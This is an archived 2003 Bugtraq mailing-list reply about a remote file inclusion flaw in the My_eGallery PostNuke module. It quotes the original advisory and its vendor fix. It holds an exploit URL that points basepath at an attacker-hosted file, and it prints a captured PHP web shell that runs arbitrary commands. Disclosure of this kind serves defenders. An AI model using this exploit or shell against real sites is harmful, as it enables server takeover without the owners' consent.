Re: Remote execution in My_eGallery

From: Fauvet Ludovic (etix_at_runbox.com)
Date: 11/30/03

  • Next message: Jay Gates: "Re: phpBB 2.06 search.php SQL injection" 
    Date: Sun, 30 Nov 2003 01:16:31 +0100
To: bugtraq@securityfocus.com

    Hi,
    There is some php scrits which are vulnerables.
    One of these is displayCategory.php .
    So you just have to go to:
    http://www.[vulnerable].com/modules/My_eGallery/public/displayCategory.php?basepath=http://[youwebsite].com
    And create a directory "public" in the root of your website and put a
    file named imageFunctions.php with the code you want to inject. 

    -- 
/*-------------------
Best regards,
[::eTiX::]
(Fauvet Ludovic)
-------------------*/
Bojan Zdrnja wrote:
> Product: My_eGallery
> Versions affected: all <3.1.1.g
> Website: http://lottasophie.sourceforge.net/index.php
> 
> 1. Introduction
> ---------------
> 
> My_eGallery is a very nice PostNuke module, which allows users to create and
> manipulate their own galleries on the web, plus offers various additional
> features.
> For more information and a demonstration you can go to the Website above.
> 
> 2. Exploit
> ----------
> 
> Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
> vulnerability.
> 
> Certain php files have some parameters which are used in include functions
> not filtered.
> An intruder can craft PHP code on their Web site and supply parameter to
> My_eGallery so it actually includes malicious PHP code.
> 
> The following code was captured as being used in the wild (edited
> intentionally):
> 
> <?
>   // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
>   if (isset($chdir)) @chdir($chdir);
>   ob_start();
>   execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
>   $output = ob_get_contents();
>   ob_end_clean();
>   print_output();
> ?>
> 
> This allows execution of any command on the server with My_eGallery, under
> the privileges of the Web server (usually apache or httpd).
> 
> 
> 3. Solution
> -----------
> 
> Vendor was contacted and promptly replied. Fix is available at the vendor's
> site:
> 
> http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&fil
> e=index&req=viewdownload&cid=5
> 
> As this was seen being exploited in the wild, users are urged to upgrade to
> the latest version as soon as possible.
> 
> 
> 
> 
> Regards,
> 
> Bojan Zdrnja
> CISSP
> 
> 
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.2.1
mQGiBD744NQRBACSpcLYHKjo3PCDHVuJZFkzNkK9gzjCNXQnzIwpPwEI5xJd5VuX
g3+gNw0VfYx/qtIXhKW0lGAulEearMpc3SzxTB7vbz8DNU/xquxJPl4yovroJVQz
fE+r9O836yF2SvD8SgiCZfT1uBDNhU2C7z72epc5jsSYDqBMyjm/DS8t7wCg3zgF
NbwEYkx65RNBw4wpGV+o42kD/itttOB/P0Qy8/TLo8RL591PjovuCXsuy11ojS3W
Prewtx9hLO1lheqtrM+xh1fZ9P2c99KBbqVYAHLYjG/rIJGGap9TvisXYnZw2xYg
XQUpv1IB3TyUjKykTwD1L9lTl40Gy32NQLVmf4QEowXJxANVQcybe6GjoMifoY4U
bYZgA/45OW7lL6ufLVREo3WMWIxCqwPDWmyTvAk4vPKexhcSvTgBrjaUFKn8Jk0A
W0IyEM9JjTckgGVOoP5tubhEk2xVzc7dZ0D9oJvmHj92dp0Sbb+HG1uD4v2VmWWM
OoZTDvbk52LJHqfTlXZpalbmFBPg63KzIANgADdicrxxRTLE9LQtRmF1dmV0IEx1
ZG92aWMgKFs6OmVUaVg6Ol0pIDxldGl4QHJ1bmJveC5jb20+iFkEExECABkFAj74
4NQECwcDAgMVAgMDFgIBAh4BAheAAAoJEM+k/AIs6moUaN4AoKrMa/7z7ioFoMM+
ZCN7XGF5pZgpAJ9P0s2pjF2yajoQhT+PPf1WkKmY07kBzQQ++ODZEAcAvAG8v2P8
rWZAs3nFpCJxxYLyEd/HzanEhZ0o2uOQbwrQO3lfJRKwvjhkiZ4Th3bEILEShvhe
gVR4Q2KhSD/c7NUmADI945OMCwWajgPF+/voYKuChLt0gFiOYiT5aK9ElhU9BjTe
guAyMvAsxxski8ntJn+FX7KTjmwqfyRdJtvvxPh5bqqctJqkgVEeGfBPAL0aCjBh
ucZB2j8Ecadzy9SNIvYrF7S1QpBFk7+8dIz15gqd00YPJa5eoUzI/AO1FIKigZdt
mg60PLMNvU5q+TmKFhibE8ZjGOjzErlRM+8AAwUHAKuTuFGLzggST4hvDnI88yLY
q4GUvH+DlAtmhhElOz9HBgNl1sppLqzqnHhcMAaiHKYBU/OV4tNI+FlhfbV8ZQEx
EWKTtxO0sLX3zXWxghkmfxglZggejb8R5pwvP0EzBuKpthAEAHRbWdZxkrqUDw8q
IuPetoeHOCeFMYLeneZZPnPfGALSxfg3ivQMf5tn3LAvP+80dOOVdB0k5GWdWv/4
yBj+mUnhdLuRbtL2mate/jPLB8JGhklk4nntXkf9DvUUhqEYrEx1o1jYyRYFUkVy
bMiS0y3S26O/pgDz88GRiEYEGBECAAYFAj744NkACgkQz6T8AizqahQYXACgjPiE
/GBKDhTcWf1F1A+4aVIazksAoKTa1m181gR8wHDa84VbRQ5aCShe
=Sid/
-----END PGP PUBLIC KEY BLOCK-----
  • Next message: Jay Gates: "Re: phpBB 2.06 search.php SQL injection"